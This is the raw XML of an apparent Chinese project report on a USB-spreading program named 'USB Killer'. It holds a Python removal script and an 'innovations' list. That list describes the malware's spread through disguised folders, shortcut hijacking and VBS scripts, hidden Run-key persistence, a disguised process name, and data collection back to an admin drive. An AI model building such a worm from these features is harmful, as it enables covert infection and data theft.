          <w:p w14:paraId="779289A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073</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF405B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074</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B829D3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075</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5629842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076</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EF6874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077</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15A526C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078</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="510DD5D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079</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28519BF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080</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0745CE9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081</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E0DBFD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082</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A747EF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083</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F67F25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084</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0514AD7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085</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2127CE1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086</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C73236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087</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7159802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088</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34F510E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089</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A688F3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090</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="023A4B5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091</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B45190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092</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F776A9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093</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B860D9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094</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5D089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095</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="088F5AB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096</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7916540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097</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AC4D12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098</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054AF8C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099</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22A127E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100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="578F92B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101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59A1382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102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FE715F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103</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="795F02A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104</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA0A5B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105</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47175BF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auto" w:sz="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106</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="88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75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="1F4D2E1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os</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB0FD5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shutil</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5793F0C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winreg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174407C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psutil</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FB8711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tempfile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73AD24B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ctypes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="456D89F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sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F169AB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ctypes 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wintypes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B03FAE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  <w:p w14:paraId="48327D4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USBKillerRemover:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34E226D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__init__(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self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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ADE144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/>
                <w:iCs/>
                <w:caps w:val="0"/>
                <w:color w:val="008200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# 定义恶意程序特征</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00730C7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        self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.malware_names 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[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'usb.exe'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,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'资料库.exe'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]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E07DF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        self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.suspicious_dirs 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[</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD238E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os.path.join(os.environ[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'APPDATA'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],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'usb_killer'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),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7438013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'D:\\usb_killer'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,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26AF45B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os.path.join(tempfile.gettempdir(),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'usb_killer'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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B8511F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]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B21371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        self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.registry_key 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r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"Software\Microsoft\Windows\CurrentVersion\Run"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E590E9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        self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.registry_value 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"USBCopy"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0738106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  <w:p w14:paraId="4F43A8C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kill_malware_processes(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self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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B414EF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/>
                <w:iCs/>
                <w:caps w:val="0"/>
                <w:color w:val="008200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"""终止所有关联恶意进程"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FCEB79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killed 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False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F366ED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proc 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psutil.process_iter([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'name'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,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'exe'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]):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D19D85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try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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ADCAB3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proc.info[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'name'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] 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self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.malware_names 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or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\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5648E2D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                   any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(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'usb_killer'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proc.info[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'exe'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].lower() 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_ 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[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0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]):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73B73E6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                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proc.kill()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587155F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                    print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(f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"[+] 已终止进程: {proc.info['name']}"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B5F28C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                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killed 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True</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752A2A7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except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(psutil.NoSuchProcess, psutil.AccessDenied):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61EE133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continue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70F5A90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killed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BD820F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  <w:p w14:paraId="62352CC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clean_registry(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self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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D9F98A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/>
                <w:iCs/>
                <w:caps w:val="0"/>
                <w:color w:val="008200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"""清理注册表自启动项"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73BF03C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try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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C8D66F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with winreg.OpenKey(winreg.HKEY_CURRENT_USER, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="290215F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                              self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.registry_key, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466080D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                              0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, winreg.KEY_WRITE) as key:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30E4382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winreg.DeleteValue(key,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self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.registry_value)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B9E1F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                print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(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"[+] 已清除注册表自启动项"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D8B128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True</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="322F0EE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except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WindowsError:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="319DAC7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            print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(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"[-] 未发现注册表残留"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D6DB85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False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="244A618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  <w:p w14:paraId="43A6D58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remove_malware_files(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self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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7356DFE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/>
                <w:iCs/>
                <w:caps w:val="0"/>
                <w:color w:val="008200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"""删除所有恶意文件"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B9DE5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deleted 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False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DA7B01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dir_path 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self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.suspicious_dirs:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33F3725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os.path.exists(dir_path):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="671D309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try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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11E1A62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                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shutil.rmtree(dir_path)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E338B4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                    print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(f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"[+] 已删除目录: {dir_path}"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EB4F18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                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deleted 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True</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02413DA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except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Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32EFF3C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                    print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(f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"[-] 删除失败 {dir_path}: {str(e)}"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3780412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deleted</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="417B9EE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  <w:p w14:paraId="75F5C06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scan_usb_drives(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self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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7450109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/>
                <w:iCs/>
                <w:caps w:val="0"/>
                <w:color w:val="008200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"""扫描并清理U盘残留"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DA7017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infected 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False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253ACD5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part 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psutil.disk_partitions():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466DCA7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'removable'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part.opts.lower():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E968B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drive 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part.mountpoint</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E06581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root, _, files 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os.walk(drive):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DF676E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                    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file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files:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DE939B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                        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file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self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.malware_names:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54F6096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                            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try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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24CCEB0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                            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os.remove(os.path.join(root,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file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))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A8C931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                                print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(f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"[+] 已清理U盘文件: {file}"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="420171A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                            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infected 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True</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB08C8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                            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except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Exception as e:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01619E6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                                print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(f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"[-] 清理失败 {file}: {str(e)}"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65FEF25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infected</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2586880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  <w:p w14:paraId="41B429A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run(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self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):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AB60D2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/>
                <w:iCs/>
                <w:caps w:val="0"/>
                <w:color w:val="008200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"""主执行流程"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7027605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        print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(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"=== USB Killer恶意程序清理工具 ==="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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43E9457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  <w:p w14:paraId="22DFE83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/>
                <w:iCs/>
                <w:caps w:val="0"/>
                <w:color w:val="008200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# 终止进程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3087EBC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self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.kill_malware_processes():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E4C755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            print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(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"[!] 发现并终止了恶意进程"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45EAB87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  <w:p w14:paraId="08586ED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/>
                <w:iCs/>
                <w:caps w:val="0"/>
                <w:color w:val="008200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# 清理注册表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C40955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        self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.clean_registry()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E91041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  <w:p w14:paraId="36DD80D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/>
                <w:iCs/>
                <w:caps w:val="0"/>
                <w:color w:val="008200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# 删除文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="186AF43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self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.remove_malware_files():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1247227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            print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(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"[!] 发现并删除了恶意文件"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7010163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  <w:p w14:paraId="0BBD850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/>
                <w:iCs/>
                <w:caps w:val="0"/>
                <w:color w:val="008200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# 扫描U盘</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="683BC1C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self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.scan_usb_drives():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3245DA7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            print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(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"[!] U盘中发现残留文件"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="675A113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  <w:p w14:paraId="08C3EC3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        print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(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"[√] 清理完成，建议重启计算机"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F21C8A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  <w:p w14:paraId="77FC2C0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__name__ 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"__main__"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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FBCAAC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ctypes.windll.shell32.IsUserAnAdmin():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ACE42D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remover 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USBKillerRemover()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77650B1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remover.run()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20A79FF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else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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060FDAD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        print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(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"请以管理员权限运行此程序！"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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0139979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ctypes.windll.shell32.ShellExecuteW(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None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,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"runas"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, sys.executable, __file__,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None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,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BEB9B3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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22603122">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="223" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364F9305">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>精准进程终止</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73683C56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>通过psutil检测所有运行中的usb.exe或资料库.exe进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59927C85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>同时检查进程路径是否包含usb_killer关键词（防改名绕过）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD9521">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default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</w:rPr>
        <w:t>全面路径覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09457F02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>检查三个可能安装路径：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D53F85A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>%APPDATA%\usb_killer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091EA77F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>D:\usb_killer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB401C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>系统临时目录下的安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA79525">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>3.注册表专项清理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED9112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>精确删除HKCU\Software\Microsoft\Windows\CurrentVersion\Run下的USBCopy值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22811BB5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>避免误删其他合法启动项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487C2F42">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>4. ​U盘深度扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2068CCF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>遍历所有可移动设备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CBFB2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>删除根目录和子目录中的恶意程序副本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9868C">
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>5.权限自适应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B2E27F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>自动检测管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7F2A91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="569" w:leftChars="0" w:hanging="359" w:firstLineChars="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>非管理员运行时自动请求UAC提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F9E27F"/>
    <w:p w14:paraId="39AA7C08">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr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947B971">
      <w:pPr>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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四</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>、创新点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B7737F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>智能多级传播机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B3CF1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>结合伪装文件夹、快捷方式劫持与VBS脚本三重传播方式，大幅提升隐蔽性和感染成功率</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C18A5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>动态路径选择策略（D盘 &gt; AppData &gt; 临时目录），适配不同系统环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7D5F46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>基于哈希值的文件去重，避免重复操作引发异常日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3745362B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>双向加密验证体系</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F624576">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>采用Fernet对称加密保护管理员令牌，防止伪造U盘绕过检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C32DEE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>支持管理员U盘反向同步，实现数据安全回收</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5327F466">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>基于SHA-256的时序攻击防御校验，确保令牌比对安全性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AB07A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>动态文件过滤引擎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB43B53">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>多维度扫描策略：文件名关键词匹配、文件内容语义分析、扩展名黑名单过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D06B26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>自适应大文件跳过机制（&gt;100MB），平衡效率与资源占用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F787B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>文本文件前4KB快速扫描算法，兼顾性能与检出率</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8966C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>隐蔽持久化设计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6CD422">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>注册表自启动项与隐藏系统属性结合，规避常规安全扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF13219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="137" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>进程名称伪装（如"资料库.exe"），模仿正常办公软件特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F2B7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
